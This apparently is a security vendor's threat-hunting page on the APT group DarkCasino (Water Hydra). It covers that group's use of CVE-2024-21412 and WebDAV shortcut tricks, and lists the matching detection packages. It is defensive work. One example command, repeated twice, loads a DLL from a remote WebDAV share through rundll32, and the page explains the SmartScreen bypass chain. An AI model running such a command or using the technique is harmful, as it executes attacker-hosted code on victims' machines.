Threat Overview – DarkCasino
The APT group, DarkCasino (also known as Water Hydra), has been in the wild since 2021 and has had operations observed targeting online trading platforms in Asia, the Middle East, and Europe. Examples of the specific targets are gambling websites, casinos, banks, cryptocurrency and stock trading platforms. Their modus operandi is to steal assets from the victims’ and their online accounts by stealing passwords from victimized hosts. Their attack method(s) at first were similar to the TTP’s used by another APT group named Evilnum, however they have since expanded their capabilities. In recent events, the evolving APT group has been observed exploiting their own developed Visual Basic-based malware named “DarkMe”. It has been utilized to exploit CVE-2023-38831 (a WinRAR Zero-Day vulnerability discovered in mid-2023), and most recently deployed by the exploitation of CVE-2024-21412 (Windows Defender SmartScreen Zero-Day). With DarkCasino’s evolution and therefore, sophisticated nature, as well as their ability to exploit new vulnerabilities as they are found – it is important to assess, understand and prepare for the actor’s capabilities and operations.
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Hunt Packages
Direct to IP Address in Execution of WebDav DLL via Rundll32 – Malicious Link or Exploitation
This Hunt Package focuses on identifying attempts by attackers to coax Microsoft applications, LOLB or similar applications to utilize WebDav to communicate over HTTP to attacker controlled infrastructure. In recent reports, attackers have exclusively utilized direct to IP communication for their WebDAV addresses. As such, the provided query syntax looks for the composition of an IP structured like a UNC path within the execution of rundll32 to create a WebDAV session. This activity has been observed in several vulnerabilities, such as CVE-2023-22397, CVE-2023-36025 and CVE-2024-21412. Web Distributed Authoring and Versioning (WebDav) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In typical use, WebDav provides a convenient means for file sharing and collaboration. WebDav can be abused by adversaries to execute arbitrary code and perform other malicious activities, such as specially crafted links in websites and phishing emails, and Internet Shortcuts.
Suspicious File Executed From INetCache – Potential Malicious Script Executed From Remote Host
Attackers can utilize malicious WebDAV servers to host files that will execute remotely from a compromised host. When a file is retrieved and subsequently executed via a WebDAV share, a copy of the file is temporarily stored in AppData\Local\Microsoft\Windows\INetCache. This technique can be utilized via malicious links clicked on by the user, or by the attacker post compromise as a method to easily execute their malware across multiple devices without the need to move the malware from system to system. The provided query logic focuses on suspicious processes executing files from this folder, without looking at specific extensions, as the extent of this technique is unknown, and extensions may not be required in some situations. In February of 2024, the vulnerability tracked as CVE-2024-21412 was unearthed by Trend Micro as a result of analysis from a DarkCasino (Water Hydra) attack. This vulnerability abuses Internet Shortcuts to chain multiple shortcuts together to eventually bypass Defender SmartScreen, which notifies users when a file may be malicious to execute. The last step of the observed attack bypassed the path applied for CVE-2023-36025, which was also a SmartScreen bypass. This technique is quite creative as the user is tricked into executing a malicious Internet Shortcut from a WebDAV share after clicking on a link. The attacker did this by making the pop-up window that follows the link appear to be the user’s downloads, where its actually the attacker controlled WebDAV share. Once the user clicked on the malicious Internet Shortcut, another Internet Shortcut was retrieved, which pointed to a malicious .cmd file located within a .zip file on the WebDAV share.
Suspicious File Extension Written to INetCache – Potential Malicious File Downloaded From Remote Host
Attackers can utilize malicious WebDAV servers to host files that will execute remotely from a compromised host. When a file is retrieved and subsequently executed via a WebDAV share, a copy of the file is temporarily stored in AppData\Local\Microsoft\Windows\INetCache. This technique can be utilized via malicious links clicked on by the user, or by the attacker post compromise as a method to easily execute their malware across multiple devices without the need to move the malware from system to system. This can be achieved via commands such as rundll32.exe \10.10.1.1\webDAV\share\safe.dll,EntryPoint1. In February of 2024, the vulnerability tracked as CVE-2024-21412 was unearthed by Trend Micro as a result of analysis from a DarkCasino (Water Hydra) attack. This vulnerability abuses Internet Shortcuts to chain multiple shortcuts together to eventually bypass Defender SmartScreen, which notifies users when a file may be malicious to execute. The last step of the observed attack bypassed the path applied for CVE-2023-36025, which was also a SmartScreen bypass. This technique is quite creative as the user is tricked into executing a malicious Internet Shortcut from a WebDAV share after clicking on a link. The attacker did this by making the pop-up window that follows the link appear to be the user’s downloads, where its actually the attacker controlled WebDAV share. Once the user clicked on the malicious Internet Shortcut, another Internet Shortcut was retrieved, which pointed to a malicious .cmd file located within a .zip file on the WebDAV share.
Autorun or ASEP Registry Key Modification
A common method that adversaries and malicious software alike achieve persistence is by adding a program to the startup folder or referencing it with a Registry run key. Adding an entry to the “run keys” in the Registry or startup folder allows the referenced program to be executed when a user logs in. They are often utilized for legitimate purposes, however when utilized maliciously the key name/value is often obviously suspicious, such as random names, or objects loaded from temp or public folders.
Suspicious File Extension Executed From INetCache – Potential Malicious File Executed From Remote Host
Attackers can utilize malicious WebDAV servers to host files that will execute remotely from a compromised host. When a file is retrieved and subsequently executed via a WebDAV share, a copy of the file is temporarily stored in AppData\Local\Microsoft\Windows\INetCache. This technique can be utilized via malicious links clicked on by the user, or by the attacker post compromise as a method to easily execute their malware across multiple devices without the need to move the malware from system to system. This can be achieved via commands such as rundll32.exe \10.10.1.1\webDAV\share\safe.dll,EntryPoint1. In February of 2024, the vulnerability tracked as CVE-2024-21412 was unearthed by Trend Micro as a result of analysis from a DarkCasino (Water Hydra) attack. This vulnerability abuses Internet Shortcuts to chain multiple shortcuts together to eventually bypass Defender SmartScreen, which notifies users when a file may be malicious to execute. The last step of the observed attack bypassed the path applied for CVE-2023-36025, which was also a SmartScreen bypass. This technique is quite creative as the user is tricked into executing a malicious Internet Shortcut from a WebDAV share after clicking on a link. The attacker did this by making the pop-up window that follows the link appear to be the user’s downloads, where its actually the attacker controlled WebDAV share. Once the user clicked on the malicious Internet Shortcut, another Internet Shortcut was retrieved, which pointed to a malicious .cmd file located within a .zip file on the WebDAV share.
Windows cmd.exe Launching Script Interpreter
The intent of the provided query logic is to look for the execution of cscript.exe or wscript.exe processes, with a parent of cmd.exe. Attackers often abuse these LOLBs to launch scripts and other malicious commands in an attempt to hide with legitimate activity or bypass defenses.
Abnormal Execution of WebDav DLL via Rundll32 – Potentially Malicious Link or Exploitation
This Hunt Package focuses on identifying attempts by attackers to coax Microsoft applications, LOLB or similar applications to utilize WebDav to communicate over HTTP to attacker controlled infrastructure. In March 2023, Microsoft issued a patch for the vulnerability tracked as CVE-2023-23397, which was a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends an appointment with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server. In addition to SMB, it was found ports and services could be forced, such as WebDav over SSL:443 or HTTP:80. Web Distributed Authoring and Versioning (WebDav) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In typical use, WebDav provides a convenient means for file sharing and collaboration. WebDav can be abused by adversaries to execute arbitrary code and perform other malicious activities. In this particular case, attackers may send malicious calendar invites or appointments, which trigger the “reminder notification” sound for the proposed meeting or event. As a result, Outlook will initiate a connection to the configured address found in the “PidLidReminderFileParameter” appointment MAPI field.
7z Password Protected Archive Accessed
This Hunt Package is designed to identify when a 7zip password protected archive has been extracted or created.
